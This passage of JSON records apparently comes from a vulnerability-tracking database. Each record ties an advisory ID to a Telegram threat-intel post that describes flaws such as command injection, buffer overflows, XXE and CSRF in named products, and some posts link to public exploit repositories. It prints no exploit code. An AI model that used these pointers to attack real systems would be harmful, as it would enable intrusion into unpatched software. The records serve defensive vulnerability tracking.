"d0869997-280f-4b63-9271-869086e69cb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MWXW-HXVP-4R2R", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3321", "content": "#ExploitObserverAlert\n\nGHSA-mwxw-hxvp-4r2r\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-mwxw-hxvp-4r2r. Firefly III versions prior to 6.0.0 are vulnerable to improper input validation.", "creation_timestamp": "2024-01-29T09:33:11.000000Z"}, {"uuid": "9f350d55-7619-4441-8446-5530c294a262", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MHGP-P5CH-58Q3", "type": "seen", "source": "https://t.me/arpsyndicate/3320", "content": "#ExploitObserverAlert\n\nGHSA-mhgp-p5ch-58q3\n\nDESCRIPTION: Exploit Observer has 7 entries in 2 file formats related to GHSA-mhgp-p5ch-58q3. On April 20, 2022, the following vulnerability in the ClamAV scanning library versions 0.103.5 and earlier and 0.104.2 and earlier was disclosed: A vulnerability in HTML file parser of Clam AntiVirus (ClamAV) versions 0.104.0 through 0.104.2 and LTS version 0.103.5 and prior versions could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. For a description of this vulnerability, see the ClamAV blog. This advisory will be updated as additional information becomes available.", "creation_timestamp": "2024-01-29T09:31:20.000000Z"}, {"uuid": "7216fc3f-36c9-4a01-9588-6301fc48781f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MC7W-JQ93-55QG", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3319", "content": "#ExploitObserverAlert\n\nGHSA-mc7w-jq93-55qg\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-mc7w-jq93-55qg. Microsoft Edge (Chromium-based) Spoofing Vulnerability", "creation_timestamp": "2024-01-29T09:29:09.000000Z"}, {"uuid": "36456d66-2a82-4b3c-b865-9acfc0714a8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4PJ9-RQ3X-VJW5", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3289", "content": "#ExploitObserverAlert\n\nGHSA-4pj9-rq3x-vjw5\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-4pj9-rq3x-vjw5. An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::convertToType1 function.", "creation_timestamp": "2024-01-28T12:29:57.000000Z"}, {"uuid": "17a11b98-cb0d-41b9-813e-a774eaaa870d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7695-F938-C2JF", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3160", "content": "#ExploitObserverAlert\n\nGHSA-7695-f938-c2jf\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-7695-f938-c2jf. Improper Input Validation in Hitron Systems DVR LGUVR-4H 1.02~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW.", "creation_timestamp": "2024-01-28T02:11:05.000000Z"}, {"uuid": "4636bb95-fd37-4d1c-b820-4315df275362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M295-R33Q-79RG", "type": "seen", "source": "https://t.me/arpsyndicate/3344", "content": "#ExploitObserverAlert\n\nGHSA-m295-r33q-79rg\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-m295-r33q-79rg. An authentication bypass vulnerability exists in the web component of the Motorola MR2600. An attacker can exploit this vulnerability to access protected URLs and retrieve sensitive information.", "creation_timestamp": "2024-01-29T10:26:54.000000Z"}, {"uuid": "9f55a138-34f2-477b-a274-65e561351054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VHW4-MJFV-P3GG", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3342", "content": "#ExploitObserverAlert\n\nGHSA-vhw4-mjfv-p3gg\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-vhw4-mjfv-p3gg. Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary code by uploading a specially crafted SVG file.", "creation_timestamp": "2024-01-29T10:22:47.000000Z"}, {"uuid": "9dafac00-be43-45ea-8379-da3326718884", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2532-VM9M-G275", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3260", "content": "#ExploitObserverAlert\n\nGHSA-2532-vm9m-g275\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-2532-vm9m-g275. A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function formSetPPTPServer. The manipulation of the argument startIp leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252129 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", "creation_timestamp": "2024-01-28T09:43:44.000000Z"}, {"uuid": "8cee6a27-5994-4e26-879c-8877ea9cde4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4957-7VHP-7V59", "type": "seen", "source": "https://t.me/arpsyndicate/3259", "content": "#ExploitObserverAlert\n\nGHSA-4957-7vhp-7v59\n\nDESCRIPTION: Exploit Observer has 1 entries in 1 file formats related to GHSA-4957-7vhp-7v59. A vulnerability, which was classified as critical, has been found in van_der_Schaar LAB synthcity 0.2.9. Affected by this issue is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024.", "creation_timestamp": "2024-01-28T09:39:40.000000Z"}, {"uuid": "69bc76b4-2633-463b-a2eb-564fc5487e43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P28X-4R5H-PH6J", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4030", "content": "#ExploitObserverAlert\n\nGHSA-p28x-4r5h-ph6j\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-p28x-4r5h-ph6j. Liferay Portal Message Board widget and Liferay DXP vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-02-22T20:09:44.000000Z"}, {"uuid": "dc340938-cdd2-4154-92b9-08788b16fdab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9P43-HJ5J-96H5", "type": "seen", "source": "https://t.me/arpsyndicate/4624", "content": "#ExploitObserverAlert\n\nCVE-2024-29019\n\nDESCRIPTION: Exploit Observer has 4 entries in 2 file formats related to CVE-2024-29019. ESPHome is a system to control microcontrollers remotely through Home Automation systems. API endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete). It is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform. This vulnerability allows bypassing authentication on API calls accessing configuration file operations on the behalf of a logged user. In order to trigger the vulnerability, the victim must visit a weaponized page. In addition to this, it is possible to chain this vulnerability with GHSA-9p43-hj5j-96h5/ CVE-2024-27287 to obtain a complete takeover of the user account. Version 2024.3.0 contains a patch for this issue.\n\nFIRST-EPSS: 0.000430000\nARPS-EXPLOITABILITY: 0.6145687", "creation_timestamp": "2024-04-13T01:34:54.000000Z"}, {"uuid": "500cf4c5-58ac-48f0-8eaa-c8d50a3a03c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M7GJ-WMP7-FWFX", "type": "seen", "source": "https://t.me/arpsyndicate/3340", "content": "#ExploitObserverAlert\n\nGHSA-m7gj-wmp7-fwfx\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-m7gj-wmp7-fwfx. A vulnerability was found in TRENDnet TEW-800MB 1.0.1.0 and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument DeviceURL leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252122 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", "creation_timestamp": "2024-01-29T10:18:48.000000Z"}, {"uuid": "fc2d14e9-2f57-4629-a7ba-d348754df418", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q22J-5R3G-9HMH", "type": "seen", "source": "https://t.me/ctinow/157042", "content": "https://ift.tt/GhkQsIC\nCVE-2023-44381 | October CMS prior 3.4.15 Template injection (GHSA-q22j-5r3g-9hmh)", "creation_timestamp": "2023-12-20T14:46:34.000000Z"}, {"uuid": "eea17a05-aa2f-4a60-a43b-a402292c8686", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P8Q3-H652-65VX", "type": "seen", "source": "https://t.me/ctinow/157041", "content": "https://ift.tt/XhpCdBj\nCVE-2023-44382 | October CMS prior 3.4.15 Safe Mode access control (GHSA-p8q3-h652-65vx)", "creation_timestamp": "2023-12-20T14:46:33.000000Z"}, {"uuid": "5a5683e6-f0b4-4b42-b34e-e4892918f6ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7872", "type": "seen", "source": "https://t.me/ctinow/155755", "content": "https://ift.tt/VW0D3s4\nRHSA-2023:7872: Important: gstreamer1-plugins-bad-free security update", "creation_timestamp": "2023-12-18T09:17:45.000000Z"}, {"uuid": "bfbcbbe7-7659-4737-874f-e8f153666560", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HFMC-7525-MJ55", "type": "seen", "source": "https://t.me/ctinow/156090", "content": "https://ift.tt/4j8C32U\n[GHSA-hfmc-7525-mj55] AsyncSSH vulnerable to Prefix Truncation Attack (a.k.a. Terrapin Attack) against ChaCha20-Poly1305 and Encrypt-then-MAC", "creation_timestamp": "2023-12-18T20:31:41.000000Z"}, {"uuid": "c21b34b3-2196-4248-8ed8-2d2e4f28cca0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJHF-4MH8-9XJQ", "type": "seen", "source": "https://t.me/ctinow/156086", "content": "https://ift.tt/N0amORh\n[GHSA-rjhf-4mh8-9xjq] Zerocopy: Some Ref methods are unsound with some type parameters", "creation_timestamp": "2023-12-18T20:27:22.000000Z"}, {"uuid": "a82c4c5d-627e-4ec3-a776-f42449857a6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4H37-Q5J3-HW96", "type": "seen", "source": "https://t.me/ctinow/156085", "content": "https://ift.tt/TQay8Ri\n[GHSA-4h37-q5j3-hw96] phpMyFAQ Cross-site Scripting vulnerability", "creation_timestamp": "2023-12-18T20:27:21.000000Z"}, {"uuid": "8c8d6a62-4309-4d91-9bd1-e0b9302cf9f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W8XJ-992G-842F", "type": "seen", "source": "https://t.me/ctinow/156084", "content": "https://ift.tt/Pzsg94w\n[GHSA-w8xj-992g-842f] phpMyFAQ Cross-site Scripting vulnerability", "creation_timestamp": "2023-12-18T20:27:20.000000Z"}, {"uuid": "b44bdc79-d239-469c-9fda-9db264fc8fb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C94J-VQR5-3MXR", "type": "seen", "source": "https://t.me/ctinow/155415", "content": "https://ift.tt/sA7qeRb\nCVE-2023-48712 | warp-tech warpgate up to 0.8.x authorization (GHSA-c94j-vqr5-3mxr)", "creation_timestamp": "2023-12-16T14:48:03.000000Z"}, {"uuid": "247935cb-9446-4401-8b68-33a6cd778fa3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X3V3-8XG8-8V72", "type": "seen", "source": "https://t.me/ctinow/156124", "content": "https://ift.tt/dnUP3Zr\n[GHSA-x3v3-8xg8-8v72] Sentry's Astro SDK vulnerable to ReDoS", "creation_timestamp": "2023-12-18T21:18:07.000000Z"}, {"uuid": "31b9c1d1-68c3-4cd0-b60b-f3fab749a5cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P5F8-QF24-24CJ", "type": "seen", "source": "https://t.me/ctinow/156629", "content": "https://ift.tt/Uz91rwM\n[GHSA-p5f8-qf24-24cj] Velocity execution without script right through tree macro", "creation_timestamp": "2023-12-19T22:47:51.000000Z"}, {"uuid": "fb65d49e-5dd7-4542-9122-1c6444005c12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3P75-Q5CC-QMJ7", "type": "seen", "source": "https://t.me/ctinow/156628", "content": "https://ift.tt/tP4xqUk\n[GHSA-3p75-q5cc-qmj7] Keycloak Open Redirect vulnerability", "creation_timestamp": "2023-12-19T22:47:50.000000Z"}, {"uuid": "2141dd01-6727-4a8b-acb0-345a5a84e5cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7WW5-4WQC-M92C", "type": "seen", "source": "https://t.me/ctinow/156615", "content": "https://ift.tt/QZfzR7N\n[GHSA-7ww5-4wqc-m92c] containerd allows RAPL to be accessible to a container", "creation_timestamp": "2023-12-19T22:27:30.000000Z"}, {"uuid": "5fa492b6-81bd-4703-9e2e-b376019f14c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67GV-XRW7-P72W", "type": "seen", "source": "https://t.me/ctinow/156614", "content": "https://ift.tt/oC45ITp\n[GHSA-67gv-xrw7-p72w] Phpsysinfo Cross Site Request Forgery (CSRF) vulnerability", "creation_timestamp": "2023-12-19T22:27:29.000000Z"}, {"uuid": "133d5ef1-03f4-481a-9dab-0f74c7317c07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G49J-J489-3XPF", "type": "seen", "source": "https://t.me/ctinow/156613", "content": "https://ift.tt/bwn5zMT\n[GHSA-g49j-j489-3xpf] Apache Superset incorrect write permissions vulnerability", "creation_timestamp": "2023-12-19T22:27:28.000000Z"}, {"uuid": "e182101a-aafb-4df2-b95c-3c75c270fbf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJ33-Q7VJ-9FR8", "type": "published-proof-of-concept", "source": "Telegram/vrYhd9EGO9YMgYE7p-1wX1LQ0PsHTFM-ZHccSrg8msBuxQ", "content": "", "creation_timestamp": "2023-11-06T20:28:49.000000Z"}, {"uuid": "a44f6a40-bb2f-4c95-84bb-76ed935f8c7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6CR6-PH3P-F5RF", "type": "seen", "source": "https://t.me/cvedetector/10243", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-52007 - HAPI FHIR XML External Entity Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-52007 \nPublished : Nov. 8, 2024, 11:15 p.m. | 19\u00a0minutes ago \nDescription : HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. XSLT parsing performed by various components are vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag (  ]&gt; could produce XML containing data from the host system. This impacts use cases where org.hl7.fhir.core is being used to within a host where external clients can submit XML. This is related to GHSA-6cr6-ph3p-f5rf, in which its fix (#1571 &amp; #1717) was incomplete. This issue has been addressed in release version 6.4.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 8.6 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Nov 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-11-09T00:44:25.000000Z"}, {"uuid": "c18a0c96-dab4-462f-807f-320ef1b00bfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2021:2306", "type": "published-proof-of-concept", "source": "Telegram/OphBtcFHpzsAaa_PBsn-6jMA-guExzs3Tjx94NVn8zTfkHs", "content": "", "creation_timestamp": "2021-06-10T02:57:54.000000Z"}, {"uuid": "e53cc87c-ba44-4b98-9dcc-b0d45887a177", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2021:2303", "type": "published-proof-of-concept", "source": "Telegram/OphBtcFHpzsAaa_PBsn-6jMA-guExzs3Tjx94NVn8zTfkHs", "content": "", "creation_timestamp": "2021-06-10T02:57:54.000000Z"}, {"uuid": "0236cb61-fe03-4ad7-90fd-546ced2513c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQCX-CCGC-XWHV", "type": "published-proof-of-concept", "source": "Telegram/xqaS9oQHj19EK8HlDk1UF-Sk0jvrfWjgjfI0LppzJ-gDvVs", "content": "", "creation_timestamp": "2024-03-03T21:29:38.000000Z"}, {"uuid": "cb6e9d2a-6616-4f17-8130-0e11fef32887", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2010:0970", "type": "published-proof-of-concept", "source": "https://t.me/anwar1213xx/1304", "content": "\u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u062a\u0645 \u0623\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0628\u062a\u0627\u0631\u064a\u062e07/12/2010. \u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u062a\u0645 \u0646\u0634\u0631\u0647\u0627 \u0628\u062a\u0627\u0631\u064a\u062e 07/12/2010 \u0643\u0640 RHSA-2010:0970 \u0643\u0640 \u0627\u0633\u062a\u0634\u0627\u0631\u064a (CERT.org). \u064a\u0645\u0643\u0646 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0627\u0633\u062a\u0634\u0627\u0631\u0629 \u0645\u0646 \u0647\u0646\u0627 kb.cert.org.\n\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0647\u0630\u0647 \u062a\u0645 \u062a\u0633\u0645\u064a\u062a\u0647\u0627CVE-2010-4344. \u062a\u0645\u062a \u0625\u062d\u0627\u0644\u0629 \u0627\u0644\u0640 \u0633\u064a \u0641\u064a \u0623\u064a30/11/2010. \u064a\u0645\u0643\u0646 \u0634\u0646 \u0627\u0644\u0647\u062c\u0645\u0629 \u0627\u0644\u0625\u0644\u0643\u062a\u0631\u0648\u0646\u064a\u0629 \u0647\u0630\u0647 \u0639\u0646 \u0628\u0639\u062f. \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u062a\u0642\u0646\u064a\u0629 \u0645\u062a\u0648\u0641\u0631\u0629. \u0627\u0644\u062a\u0642\u0627\u0631\u064a\u0631 \u062a\u0634\u064a\u0631 \u0628\u0623\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0647\u0630\u0647 \u0630\u0627\u062a \u0634\u0647\u0631\u0629 \u0623\u0642\u0644 \u0645\u0646 \u0627\u0644\u0645\u062a\u0648\u0633\u0637. \u0647\u0646\u0627\u0644\u0643 \u0625\u0643\u0633\u0628\u0644\u0648\u064a\u062a \u0645\u062a\u0648\u0641\u0631\u0629. \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646 \u0627\u0644 \u0625\u0643\u0633\u0628\u0644\u0648\u064a\u062a \u0648\u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627. \u0633\u0639\u0631 \u0627\u0644 \u0625\u0643\u0633\u0628\u0644\u0648\u064a\u062a \u0647\u0630\u0647 \u064a\u062a\u0631\u0627\u0648\u062d \u0628\u062d\u0648\u0627\u0644\u064a \u062a\u0642\u0631\u064a\u0628\u0627\u064bUSD $0-$5k \u0641\u064a \u0647\u0630\u0647 \u0627\u0644\u0644\u062d\u0638\u0629.\n\n\u062a\u0645 \u0623\u0639\u062a\u0628\u0631\u0627\u0647\u0627 \u0639\u0644\u0649 \u0623\u0646\u0647\u0627 \u0641\u0639\u0627\u0644\u0629 \u0644\u0644\u063a\u0627\u064a\u0629. \u062a\u0633\u062a\u0637\u064a\u0639 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0625\u0643\u0633\u0628\u0644\u0648\u064a\u062a \u0645\u0646 \u0647\u0646\u0627 securityfocus.com. \u0628\u0645\u0627 \u0623\u0646\u0647\u0627 \u062b\u063a\u0631\u0629 \u0647\u062c\u0648\u0645 \u0641\u0648\u0631\u064a \u0641\u0642\u062f \u0643\u0627\u0646 \u0645\u062a\u0648\u0633\u0637 \u0633\u0639\u0631\u0647\u0627 \u0647\u0648 \u062a\u0642\u0631\u064a\u0628\u0627$0-$5k. \u0628\u0631\u0646\u0627\u0645\u062c \u0646\u064a\u0633\u0648\u0633 \u0644\u0641\u062d\u0635 \u0627\u0644\u0634\u0628\u0643\u0627\u062a \u064a\u0648\u0641\u0631 \u0645\u0644\u062d\u0642 \u0628\u0639\u0646\u0648\u0627\u064668160(Oracle Linux 4 / 5 : exim (ELSA-2010-0970)), \u064a\u0645\u0643\u0646\u0643 \u0645\u0646 \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0648\u062c\u0648\u062f \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629. \u0623\u0646\u0647\u0627 \u0645\u0635\u0646\u0641\u0629 \u0625\u0644\u0649 \u0639\u0627\u0626\u0644\u0629Oracle Linux Local Security Checks. \u0627\u0644\u0645\u0644\u062d\u0642 \u064a\u0639\u0645\u0644 \u0628\u062d\u0633\u0628 \u0627\u0644\u0635\u0646\u0641local. \u0648\u0647\u0648 \u064a\u0639\u062a\u0645\u062f \u0639\u0644\u0649 \u0627\u0644\u0645\u0646\u0641\u06300. \u062e\u062f\u0645\u0629 \u0641\u062d\u0635 \u0627\u0644\u0634\u0628\u0643\u0627\u062a \u0643\u0648\u064a\u0644\u0633 \u064a\u0645\u0643\u0646\u0647\u0627 \u0627\u0644\u0643\u0634\u0641 \u0639\u0646 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0628\u0648\u0627\u0633\u0637\u0629 \u0645\u0644\u062d\u0642118827 (Red Hat Update for Exim (RHSA-2010:0970)).\n\n\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0633\u062e\u0629 \u0625\u0644\u0649 \u0625\u0635\u062f\u0627\u06313.15 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u062d\u0644 \u0647\u0630\u0647 \u0627\u0644\u0645\u0634\u0643\u0644\u0629. \u062a\u0635\u062d\u064a\u062d \u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u0647\u0630\u0647 \u064a\u0645\u0643\u0646 \u062a\u062d\u0645\u064a\u0644\u0647 \u0645\u0646 \u0647\u0646\u0627 git.exim.org. \u0646\u0646\u0635\u062d \u0628\u0640 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0645\u0643\u0648\u0646 \u0627\u0644\u0645\u062a\u0623\u062b\u0631 \u0628\u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629. \u0627\u0644\u062a\u0635\u062d\u064a\u062d \u062a\u0645 \u0646\u0634\u0631\u06472 \u0623\u064a\u0627\u0645 \u0628\u0639\u062f \u0627\u0644\u0627\u0641\u0635\u0627\u062d \u0639\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n\n\u0628\u0627\u0644\u0627\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 \u0647\u0630\u0627 \u064a\u0645\u0643\u0646 \u0627\u0644\u0643\u0634\u0641 \u0648\u0645\u0646\u0639 \u0645\u062b\u0644 \u0647\u0630\u0647 \u0627\u0644\u0647\u062c\u0645\u0627\u062a \u0639\u0646 \u0637\u0631\u064a\u0642 \u0623\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0646\u0627\u0645\u062c \u062a\u0628\u0646\u0643 \u0628\u0648\u064a\u0646\u062a \u0645\u0639 \u0627\u0644\u0641\u0644\u062a\u0631 \u0647\u0630\u062710824. \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0647\u0630\u0647 \u062a\u0645 \u062a\u0633\u062c\u064a\u0644\u0647\u0627 \u0641\u064a \u0642\u0648\u0627\u0639\u062f \u0628\u064a\u0627\u0646\u0627\u062a \u0622\u062e\u0631\u0649: SecurityFocus (BID 45308), Secunia (SA40019), SecurityTracker (ID 1024858), Vulnerability Center (SBV-28629) , Tenable (68160).\n\n\nhttps://t.me/YCS_CVE", "creation_timestamp": "2021-11-19T16:56:31.000000Z"}, {"uuid": "c7128944-fc8e-44c2-b17f-7265d66abc0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JCV-VP96-94XR", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/305", "content": "#exploit\n1. CVE-2024-7954:\nUnauth RCE in SPIP\nhttps://github.com/Chocapikk/CVE-2024-7954\n\n2. CVE-2024-0692:\nSolarWinds Security Event Manager AMF deserialization RCE\nhttps://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692\n\n3. CVE-2024-24759:\nBypass SSRF Protection with DNS Rebinding\nhttps://github.com/mindsdb/mindsdb/security/advisories/GHSA-4jcv-vp96-94xr", "creation_timestamp": "2024-09-09T14:48:44.000000Z"}, {"uuid": "b459d768-5903-481a-9af3-40b2d1e2534b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H27C-6XM3-MCQP", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/208", "content": "#exploit\n1. CVE-2024-41660:\nVulnerability in OpenBMC\nhttps://tetrelsec.com/posts/cve-2024-41660-slpd-lite\n\n2. CVE-2024-43403:\nKanister Vulnerability\nhttps://github.com/kanisterio/kanister/security/advisories/GHSA-h27c-6xm3-mcqp", "creation_timestamp": "2024-08-25T20:54:36.000000Z"}, {"uuid": "0cb86982-b7ee-49d3-a798-533ea625cce4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 